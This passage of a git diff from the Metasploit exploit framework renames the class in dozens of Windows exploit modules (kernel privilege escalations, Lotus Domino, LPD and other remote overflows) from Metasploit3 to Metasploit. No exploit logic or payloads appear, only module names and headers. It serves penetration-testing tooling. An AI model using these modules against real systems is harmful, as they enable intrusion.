Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index 8145b65278..ca75776249 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -8,7 +8,7 @@ require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/exploit/exe' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms10_092_schelevator.rb b/modules/exploits/windows/local/ms10_092_schelevator.rb index dc91903f4b..7dde5dc46e 100644 --- a/modules/exploits/windows/local/ms10_092_schelevator.rb +++ b/modules/exploits/windows/local/ms10_092_schelevator.rb @@ -8,7 +8,7 @@ require 'rex' require 'zlib' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb index 662481af63..ecce4f31f9 100644 --- a/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb +++ b/modules/exploits/windows/local/ms11_080_afdjoinleaf.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking # Average because this module relies on memory corruption within the # kernel, this is inherently dangerous. Also if the payload casues diff --git a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb index 8729306125..8e1dc1f601 100644 --- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb +++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb @@ -9,7 +9,7 @@ require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' require 'msf/core/post/file' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms13_053_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb index 8d647f7a8d..e8a7632b55 100644 --- a/modules/exploits/windows/local/ms13_053_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb index 7095e49f9e..7c8ec7dda7 100644 --- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index de49e4a47d..88f101ea74 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index a4d5236714..383cd92f4b 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb index 2908ef555f..300eb77b76 100644 --- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb +++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb index d1430d6bab..980c4803b9 100644 --- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb +++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/ms15_004_tswbproxy.rb b/modules/exploits/windows/local/ms15_004_tswbproxy.rb index a8cf36d104..34736ba5e0 100644 --- a/modules/exploits/windows/local/ms15_004_tswbproxy.rb +++ b/modules/exploits/windows/local/ms15_004_tswbproxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_051_client_copy_image.rb b/modules/exploits/windows/local/ms15_051_client_copy_image.rb index afa42a0dcd..8967f171ac 100644 --- a/modules/exploits/windows/local/ms15_051_client_copy_image.rb +++ b/modules/exploits/windows/local/ms15_051_client_copy_image.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb index e78ff63d46..6843f84fe6 100644 --- a/modules/exploits/windows/local/ms15_078_atmfd_bof.rb +++ b/modules/exploits/windows/local/ms15_078_atmfd_bof.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ManualRanking WIN32K_VERSIONS = [ diff --git a/modules/exploits/windows/local/ms_ndproxy.rb b/modules/exploits/windows/local/ms_ndproxy.rb index dfa59f4b35..63bcaea64b 100644 --- a/modules/exploits/windows/local/ms_ndproxy.rb +++ b/modules/exploits/windows/local/ms_ndproxy.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/novell_client_nicm.rb b/modules/exploits/windows/local/novell_client_nicm.rb index 97b5f6d5b6..5a6a8beed5 100644 --- a/modules/exploits/windows/local/novell_client_nicm.rb +++ b/modules/exploits/windows/local/novell_client_nicm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/novell_client_nwfs.rb b/modules/exploits/windows/local/novell_client_nwfs.rb index e68b7eb646..38035a4073 100644 --- a/modules/exploits/windows/local/novell_client_nwfs.rb +++ b/modules/exploits/windows/local/novell_client_nwfs.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/ntapphelpcachecontrol.rb b/modules/exploits/windows/local/ntapphelpcachecontrol.rb index a0269a72b3..9dfecd1036 100644 --- a/modules/exploits/windows/local/ntapphelpcachecontrol.rb +++ b/modules/exploits/windows/local/ntapphelpcachecontrol.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = NormalRanking include Exploit::EXE diff --git a/modules/exploits/windows/local/nvidia_nvsvc.rb b/modules/exploits/windows/local/nvidia_nvsvc.rb index eaab094978..1ac1f44fab 100644 --- a/modules/exploits/windows/local/nvidia_nvsvc.rb +++ b/modules/exploits/windows/local/nvidia_nvsvc.rb @@ -11,7 +11,7 @@ require 'msf/core/post/windows/process' require 'msf/core/post/windows/reflective_dll_injection' require 'msf/core/post/windows/services' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 8648ea1dac..94a2bfbdf7 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Windows::Process diff --git a/modules/exploits/windows/local/powershell_cmd_upgrade.rb b/modules/exploits/windows/local/powershell_cmd_upgrade.rb index 8a8b4bc1bc..9f74a01df9 100644 --- a/modules/exploits/windows/local/powershell_cmd_upgrade.rb +++ b/modules/exploits/windows/local/powershell_cmd_upgrade.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Exploit::Powershell diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb index 30ad2442b7..9fe3a0a723 100644 --- a/modules/exploits/windows/local/powershell_remoting.rb +++ b/modules/exploits/windows/local/powershell_remoting.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb index 9bf0d99c53..8ac955619f 100644 --- a/modules/exploits/windows/local/ppr_flatten_rec.rb +++ b/modules/exploits/windows/local/ppr_flatten_rec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/post/windows/reflective_dll_injection' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/pxeexploit.rb b/modules/exploits/windows/local/pxeexploit.rb index 5830e98536..89e3dfef9f 100644 --- a/modules/exploits/windows/local/pxeexploit.rb +++ b/modules/exploits/windows/local/pxeexploit.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/tftp' require 'rex/proto/dhcp' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::TFTPServer diff --git a/modules/exploits/windows/local/run_as.rb b/modules/exploits/windows/local/run_as.rb index 122e0262f3..fd986bcae4 100644 --- a/modules/exploits/windows/local/run_as.rb +++ b/modules/exploits/windows/local/run_as.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 40a4dc77e1..6852df112e 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/service_permissions.rb b/modules/exploits/windows/local/service_permissions.rb index 5f182feb70..3042a02e4b 100644 --- a/modules/exploits/windows/local/service_permissions.rb +++ b/modules/exploits/windows/local/service_permissions.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/trusted_service_path.rb b/modules/exploits/windows/local/trusted_service_path.rb index dcea5907f9..e001cbca2e 100644 --- a/modules/exploits/windows/local/trusted_service_path.rb +++ b/modules/exploits/windows/local/trusted_service_path.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/local/virtual_box_guest_additions.rb b/modules/exploits/windows/local/virtual_box_guest_additions.rb index fc78d7e63f..d3e2331f47 100644 --- a/modules/exploits/windows/local/virtual_box_guest_additions.rb +++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/local/windows_kernel' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::Local::WindowsKernel diff --git a/modules/exploits/windows/local/virtual_box_opengl_escape.rb b/modules/exploits/windows/local/virtual_box_opengl_escape.rb index 22a5db2c6e..88d6c04db9 100644 --- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb +++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = AverageRanking DEVICE = '\\\\.\\VBoxGuest' diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb index f02c1e5a6c..4975125a57 100644 --- a/modules/exploits/windows/local/vss_persistence.rb +++ b/modules/exploits/windows/local/vss_persistence.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/exe' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File diff --git a/modules/exploits/windows/local/wmi.rb b/modules/exploits/windows/local/wmi.rb index 3f6a75d772..00554e574a 100644 --- a/modules/exploits/windows/local/wmi.rb +++ b/modules/exploits/windows/local/wmi.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' require 'rex' -class Metasploit3 < Msf::Exploit::Local +class Metasploit < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index c806bb71d6..021453b920 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb index f5876e4d5e..03d737edae 100644 --- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb +++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index f86f06cf09..8ed85b1d08 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lotus/lotusnotes_lzh.rb b/modules/exploits/windows/lotus/lotusnotes_lzh.rb index 95cc18d40f..ba19e4ee1f 100644 --- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb +++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # needs client interaction and permanent listener # diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 2696dfd9cf..3ed39d24fd 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 56f7267fc3..7acb9995b0 100644 --- a/modules/exploits/windows/lpd/niprint.rb +++ b/modules/exploits/windows/lpd/niprint.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index c41eccb25d..23c472fd50 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index ee2d364df6..bd32f64c51 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/achat_bof.rb b/modules/exploits/windows/misc/achat_bof.rb index 7a53dee238..bdfc68fa7e 100644 --- a/modules/exploits/windows/misc/achat_bof.rb +++ b/modules/exploits/windows/misc/achat_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/actfax_raw_server_bof.rb b/modules/exploits/windows/misc/actfax_raw_server_bof.rb index 2cf6fd756e..eaf73a37a0 100644 --- a/modules/exploits/windows/misc/actfax_raw_server_bof.rb +++ b/modules/exploits/windows/misc/actfax_raw_server_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking diff --git a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb index 8fcdb9e6d8..44f4c7bf6b 100644 --- a/modules/exploits/windows/misc/agentxpp_receive_agentx.rb +++ b/modules/exploits/windows/misc/agentxpp_receive_agentx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/allmediaserver_bof.rb b/modules/exploits/windows/misc/allmediaserver_bof.rb index 0d02343531..ccb860c254 100644 --- a/modules/exploits/windows/misc/allmediaserver_bof.rb +++ b/modules/exploits/windows/misc/allmediaserver_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/altiris_ds_sqli.rb b/modules/exploits/windows/misc/altiris_ds_sqli.rb index 383d1e5503..18067fc7ef 100644 --- a/modules/exploits/windows/misc/altiris_ds_sqli.rb +++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index dfa2e33ca2..599b5f9652 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index 5f4aaf27a6..d83fbc79ca 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb index 70c5c32675..febdbb7b17 100644 --- a/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb +++ b/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/avidphoneticindexer.rb b/modules/exploits/windows/misc/avidphoneticindexer.rb index d61bc8c168..6985910e66 100644 --- a/modules/exploits/windows/misc/avidphoneticindexer.rb +++ b/modules/exploits/windows/misc/avidphoneticindexer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bakbone_netvault_heap.rb b/modules/exploits/windows/misc/bakbone_netvault_heap.rb index f7ef75924e..561601a01d 100644 --- a/modules/exploits/windows/misc/bakbone_netvault_heap.rb +++ b/modules/exploits/windows/misc/bakbone_netvault_heap.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bcaaa_bof.rb b/modules/exploits/windows/misc/bcaaa_bof.rb index 6647a2e608..d2a9146071 100644 --- a/modules/exploits/windows/misc/bcaaa_bof.rb +++ b/modules/exploits/windows/misc/bcaaa_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index a63b9bd4fa..f4296efbac 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 49e364a014..96cfc7d23f 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index e20af52a2a..af3cdb3ed9 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb index 4bf8ff8fcf..e5bdfdb403 100644 --- a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index 9db3b25a2f..b8af59e277 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index 1bc230ad4c..2990317712 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index 2f5d35ae39..2a4a839ebd 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 0da0bbad83..53e52a5860 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index e354c56925..ba586ef09a 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 4ddb6beb1f..2452027779 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb index f64248b583..19429dc1d7 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb index 31ed2b4605..a2dad45beb 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote 